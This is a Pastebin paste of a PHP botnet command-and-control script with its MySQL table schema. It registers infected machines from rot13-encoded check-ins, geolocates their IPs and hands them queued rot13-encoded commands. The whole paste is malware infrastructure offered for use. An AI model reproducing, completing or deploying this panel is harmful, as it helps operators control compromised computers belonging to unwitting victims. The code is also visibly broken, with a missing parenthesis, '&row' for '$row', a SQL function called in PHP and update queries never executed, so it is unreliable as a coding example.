Advertisement
Guest User

Untitled

a guest
Jun 2nd, 2017
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 6.20 KB | None | 0 0
  1. <?PHP
  2.  
  3. /*
  4. CREATE TABLE `clients` (
  5. `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
  6. `serial` varchar(25) NOT NULL,
  7. `comp_name` varchar(128) NOT NULL,
  8. `os` varchar(5) NOT NULL,
  9. `delay` bigint(20) NOT NULL,
  10. `report_time` TIMESTAMP NOT NULL,
  11. `lastorder_id` bigint(10),
  12. `uptime` varchar(128) NOT NULL,
  13. `ip` varchar(15) NOT NULL,
  14. `country_code` varchar(5) NOT NULL,
  15. `country_name` varchar(20) NOT NULL,
  16. `version` varchar(10) NOT NULL
  17. ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1;
  18.  
  19. CREATE TABLE `global_orders` (
  20. `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
  21. `order` varchar(128),
  22. `order_time` TIMESTAMP NOT NULL,
  23. `exp_date` DATE NOT NULL
  24. ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1;
  25.  
  26. CREATE TABLE `orders` (
  27. `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
  28. `clientid` bigint(20) unsigned NOT NULL,
  29. `order` varchar(128),
  30. `order_time` TIMESTAMP NOT NULL
  31. ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1;
  32. */
  33.  
  34.     // file: info.php
  35.    
  36.     include("geoip.inc"); // [hacktivist:code]: for the geoip function added
  37.    
  38.     function isRowEmpty($row)
  39.     {
  40.         foreach($row as $a)
  41.         {
  42.             if(!empty($a))
  43.             {
  44.             return false;
  45.             }
  46.         }
  47.         return true;
  48.     }
  49.  
  50.    
  51.     function sanitize($data)
  52.     {
  53.         // remove whitespaces (not a must though)
  54.         $data = trim($data);
  55.  
  56.         // apply stripslashes if magic_quotes_gpc is enabled
  57.         if(get_magic_quotes_gpc())
  58.         {
  59.             $data = stripslashes($data);
  60.         }
  61.  
  62.         // a mySQL connection is required before using this function
  63.         $data = mysql_real_escape_string($data);
  64.  
  65.         return $data;
  66.     }
  67.    
  68.     // database connection information
  69.     $database = "database_name";
  70.     $user = "user_name";
  71.     $password = "Pa$$worD";
  72.     $host = "localhost";
  73.  
  74.  
  75.     // connect to the database
  76.     $mysql = mysql_connect( $host, $user, $password );
  77.     mysql_select_db( $database );
  78.  
  79.     $buffer_crypted = sanitize($_GET['sid']);
  80.    
  81.     $buffer_clear = str_rot13($buffer_crypted);
  82.  
  83.     // decrypted buffer in this format h6Yht56RfT:UncleBoB-PC:WIN7:50000:m1.0:7653332:22
  84.     //                                  $serial:$comp_name:$os:$delay:$version:$uptime:$lastorder_id
  85.    
  86.     $serial = strtok($buffer_clear, ":");
  87.     $comp_name = strtok(":");
  88.     $os = strtok(":");
  89.     $delay = strtok(":");
  90.     $version = strtok(":");
  91.     $uptime = strtok(":");
  92.     $lastorder_id = strtok(":");
  93.     $ip = getenv("REMOTE_ADDR");
  94.    
  95.     // sanitize ints
  96.    
  97.     $delay = intval($delay);
  98.     $uptime = intval($uptime);
  99.  
  100.     // format uptime
  101.     $minsuptime = $uptime % 60;
  102.    
  103.     if ( $minsuptime > 1 )
  104.     {
  105.         $minsuptime = $minsuptime." Minutes";
  106.     }
  107.     else
  108.     {
  109.         $minsuptime = $minsuptime." Minute";
  110.     }
  111.    
  112.     $hoursuptime = $uptime / 60 % 24;
  113.    
  114.     if ( $hoursuptime > 1 )
  115.     {
  116.         $hoursuptime = $hoursuptime." Hours";
  117.     }
  118.     else
  119.     {
  120.         $hoursuptime = $hoursuptime." Hour";
  121.     }
  122.    
  123.     $daysuptime = $uptime / 60 / 24 % 7;
  124.    
  125.     if ( $daysuptime > 1 )
  126.     {
  127.         $daysuptime = $daysuptime." Days";
  128.     }
  129.     else
  130.     {
  131.         $daysuptime = $daysuptime." Day";
  132.     }
  133.    
  134.     $weeksuptime = $uptime / 60 / 24 / 7 % 52;
  135.    
  136.     if ( $daysuptime > 1 )
  137.     {
  138.         $weeksuptime = $weeksuptime." Weeks";
  139.     }
  140.     else
  141.     {
  142.         $weeksuptime = $weeksuptime." Week";
  143.     }
  144.    
  145.     $uptimeformated = $weeksuptime.", ".$daysuptime.", ".$hoursuptime.", ".$minsuptime;
  146.  
  147.  
  148.     // [hacktivist:code] added geolocate IP, added the new fields in the clients table
  149.     $gi = geoip_open("GeoIP.dat",GEOIP_STANDARD);
  150.     $country_code = geoip_country_code_by_addr($gi, $ip);
  151.     $country_name = geoip_country_name_by_addr($gi, $ip);
  152.     geoip_close($gi);
  153.  
  154.     if( $serial != NULL )
  155.     {
  156.         // populate SQL table
  157.         $sql = "SELECT id FROM clients WHERE serial LIKE '$serial'";
  158.         $result = mysql_query( $sql );
  159.         if( mysql_num_rows( $result ) )
  160.         {
  161.             // if in the clients table update info
  162.             $sql = "UPDATE clients SET report_time=NULL, version='$version', uptime='$uptimeformated', delay='$delay', ip='$ip', country_code='$country_code', country_name='$country_name', lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
  163.             $result = mysql_query( $sql );
  164.            
  165.             // get the id of the connected client
  166.             $sql = "SELECT * FROM clients WHERE serial LIKE '$serial'";
  167.             $result = mysql_query( $sql );
  168.             $row = mysql_fetch_array( $result );
  169.             $clientid = $row['id'];
  170.  
  171.             // checks the orders table to see if there is a specific order for this client
  172.             $sql = "SELECT * FROM orders WHERE clientid LIKE '$clientid'";
  173.             $result = mysql_query( $sql );
  174.             $row = mysql_fetch_array( $result ); // stores the row that contains the order information for that specific client
  175.            
  176.             if (!isRowEmpty($row) // if there is a specific bot command prints it out
  177.             {
  178.                 // echo the command to the client and clear it from the orders table
  179.                 echo ">".str_rot13($row['order'])."<\n";
  180.                 $id = $row['id'];
  181.                 $sql = "DELETE FROM orders WHERE id LIKE '$id'";
  182.                 mysql_query( $sql );
  183.             }
  184.             else // grabs the next command it hasn't done in the global_orders table
  185.             {
  186.                 // if lastorder_id = 0 then same but no where stuff, just to get the first row of the table
  187.                 if ($lastorder_id == 0)
  188.                 {
  189.                     $sql = "SELECT * FROM global_orders";
  190.                     $result = mysql_query( $sql );
  191.                     $row = mysql_fetch_array( $result ); // stores the first row in global_orders
  192.                    
  193.                     if ( CURDATE() < &row['exp_date'] ) // check if the command is old or not
  194.                     {
  195.                         echo ">".str_rot13($row['order'])."<\n"; // echo the command to the client
  196.                         $sql = "UPDATE clients SET lastorder_id='$row['id']' WHERE serial LIKE '$serial'"; 
  197.                     }  
  198.                 }
  199.                 else
  200.                 {
  201.                     // check if the command is old or not to implement
  202.                     $sql = "SELECT * FROM global_orders WHERE id LIKE '$lastorder_id + 1'";
  203.                     $result = mysql_query( $sql );
  204.                     $row = mysql_fetch_array( $result ); // stores the row that contains the order information
  205.                    
  206.                     if ( CURDATE() < &row['exp_date'] ) // check if the command is old or not
  207.                     {
  208.                         echo ">".str_rot13($row['order'])."<\n"; // echo the command to the client
  209.                         $sql = "UPDATE clients SET lastorder_id='$row['id']' WHERE serial LIKE '$serial'";
  210.                     }  
  211.                 }
  212.             }
  213.         }
  214.         else
  215.         {
  216.             // else insert info into the clients table
  217.             $sql = "INSERT INTO clients ( comp_name, serial, os, ip, country_code, country_name, delay, version, uptime, lastorder_id ) VALUES ( '$comp_name ', '$serial', '$os', '$ip', '$country_code', '$country_name', '$delay', '$version', '$uptimeformated', '$lastorder_id' )";
  218.             if( mysql_query( $sql ) )
  219.                 echo ">ADDED<\n"; // allows the client to know it was succesfully added if needed
  220.         }
  221.     }      
  222. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement